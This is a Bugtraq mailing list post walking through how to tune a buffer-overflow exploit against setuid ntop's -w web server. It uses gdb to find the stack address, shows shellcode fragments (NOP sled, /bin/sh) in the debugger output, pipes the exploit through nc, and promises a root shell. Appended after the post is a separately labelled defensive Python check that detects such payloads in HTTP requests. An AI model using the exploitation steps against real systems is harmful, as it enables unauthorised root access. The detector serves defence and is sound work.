Bugtraq mailing list archives

How to find ntop -w esp value.


From: JW Oh <mat () IVNTECH COM>
Date: Thu, 26 Oct 2000 13:32:41 +0900

1. [on victim host] First modify the ntop-1.2a1 source code to execute it with non-root privilege, and compile it.
 ntop.c:362
    if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){

2. [on local host] Do "tcpdump -w somefile" to get a tcpdump file to feed to ntop. Copy it to the victim host.

3. [on victim host] Execute the following with our modified ntop
    $ ./ntop -w 8080 -f somefile
    Warning: unable to read file '.ntop'. No security will be used!
    Waiting for HTTP connections on port 8080...

4. [on victim host] Run gdb to attach to our ntop process, and break at the function returnHTTPPage.
    $ gdb ./ntop 2634
    (gdb) break returnHTTPPage
    Breakpoint 1 at 0x8051350
    (gdb) cont
    Continuing.
    [Switching to Thread 28851]


5. [on local host] Execute the exploit against the victim host
    $ ./ntop-w-exp | nc victim 8080

5. [on victim host] gdb will stop at the breakpoint on returnHTTPPage. Then set a breakpoint on the function strcpy and
continue; gdb will stop at the strcpy breakpoint. The value of "dest=0xbefffb00" is the location on the stack we will use
as the esp value.

Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.

Breakpoint 2, strcpy (dest=0xbefffb00 "$爻쓩\017\005\b\b",
    src=0x8091dc1 '\220' <repeats 50 times>, 
"圍037^\211v\b1옌210F\a\211F\fs.013\211晋215N\b\215V\f儆2001蜜211鶩儆200汪mes>bin/sh\030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030"...)
 at ../sysdeps/generic/strcpy.c:33
(gdb) cont
Continuing.

 6. [on victim host] Now kill our ntop and run the suid ntop.
   $ /usr/local/sbin/ntop -w 8080

 7. [on local host] Modify the esp value in ntop-w-exp.c and execute the exploit. You can set the offset with the first argument to
ntop-w-exp. I think the offset must be a negative value.
    $ ./ntop-w-exp | nc victim 8080

 8. [on victim host] You will get a root shell.


=================================================
|                                               |
|               mat () hacksware com               |
|                                               |
=================================================

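A defender-side check, added here and not part of the original post: it scans a captured HTTP request to ntop's -w port for the traits visible in the strcpy() breakpoint above (a run of 0x90 NOPs, the /bin/sh string, and a 0xbexxxxxx stack address repeated back to back). The sample requests are constructed, and the thresholds are assumptions.

```python
import re

MIN_SLED = 16        # assumption: NOP runs this long do not occur in legitimate HTTP
MIN_REPEATS = 8      # assumption: a return address is sprayed many times in a row

def find_nop_sled(data: bytes, min_len: int = MIN_SLED):
    """Longest run of 0x90 (x86 NOP) bytes of at least min_len, as (offset, length)."""
    best = None
    for m in re.finditer(rb"\x90{%d,}" % min_len, data):
        if best is None or len(m.group()) > best[1]:
            best = (m.start(), len(m.group()))
    return best

def find_repeated_address(data: bytes, min_repeats: int = MIN_REPEATS):
    """A 4-byte little-endian value in the 0xbe/0xbf stack range repeated back to back,
    as (address, count); the post's dest=0xbefffb00 sits in that range."""
    pattern = rb"(...[\xbe\xbf])\1{%d,}" % (min_repeats - 1)
    m = re.search(pattern, data, re.DOTALL)
    if m is None:
        return None
    return int.from_bytes(m.group(1), "little"), len(m.group()) // 4

def inspect_http_request(data: bytes) -> dict:
    """Return the suspicious traits found in one raw request (empty dict if clean)."""
    findings = {}
    sled = find_nop_sled(data)
    if sled:
        findings["nop_sled"] = sled
    if b"/bin/sh" in data:
        findings["shell_string"] = data.index(b"/bin/sh")
    addr = find_repeated_address(data)
    if addr:
        findings["repeated_address"] = addr
    return findings

# Constructed samples: a benign request and one shaped like the overflow seen in the
# post (50 NOPs, shell string, sprayed stack address); shellcode bytes replaced by "XXXX".
SAMPLE_BENIGN = b"GET /index.html HTTP/1.0\r\nHost: victim:8080\r\n\r\n"
SAMPLE_ATTACK = (b"GET /" + b"\x90" * 50 + b"/bin/sh" + b"XXXX"
                 + (0xBEFFFB00).to_bytes(4, "little") * 30 + b" HTTP/1.0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", SAMPLE_BENIGN), ("attack", SAMPLE_ATTACK)):
        print(name, inspect_http_request(req))
```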
